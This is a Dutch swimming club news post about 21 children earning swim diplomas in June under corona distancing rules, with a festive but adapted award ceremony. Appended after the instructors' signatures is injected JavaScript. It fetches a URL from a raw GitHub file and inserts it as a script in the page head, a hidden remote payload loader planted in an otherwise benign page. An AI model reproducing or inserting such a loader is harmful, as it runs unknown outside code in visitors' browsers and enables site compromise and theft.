Afzwemmen Superspetters en Certificaat behaald

*THROW🔙WEDNESDAY*
Op woensdag 24 juni hebben maar liefst 2️⃣1️⃣ kinderen hun Zwemdiploma behaald bij WZV Waalwijk. 8 kinderen hebben op deze dag hun certificaat behaald, dat gelijk staat aan een A-diploma. 13 kinderen behaalden het SuperSpetters diploma, dit diploma staat gelijk aan het A,B,C Diploma. Eigenlijk zouden de kinderen eind maart afzwemmen, maar dit was helaas niet mogelijk.
Het was een bijzondere manier van afzwemmen, omdat door het corona virus rekening gehouden moet worden met de 1,5 meter afstand. Er mocht één ouder mee de zwemzaal in, de rest van de familie kon vanaf buiten door het raam toekijken. Na het zwemgedeelte kwam de feestelijke, maar aangepaste, diploma-uitreiking. Het kind dat haar/zijn diploma had behaald mocht op de stoel gaan staan en het diploma werd in ontvangst genomen door één ouder. De ouder kon het diploma, samen met een dikke kus en knuffel, overhandigen aan zijn of haar eigen dochter/zoon.
Toen iedereen het diploma in ontvangst genomen had kregen alle kinderen nog een cadeautje🎁. Één voor één werden de kinderen naar buiten geroepen, hier werden ze met luid applaus door alle overige familieleden ontvangen.
Namens het leszwemmen wensen wij iedereen een prettige vakantie. Blijf gezond!
Tot woensdag 2 september, dan beginnen we weer met de zwemlessen👋🏻
Groetjes,
Kelly, Corry, Femke, Margriet, Elise, Thomas, Emma, Evelien en Karin (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)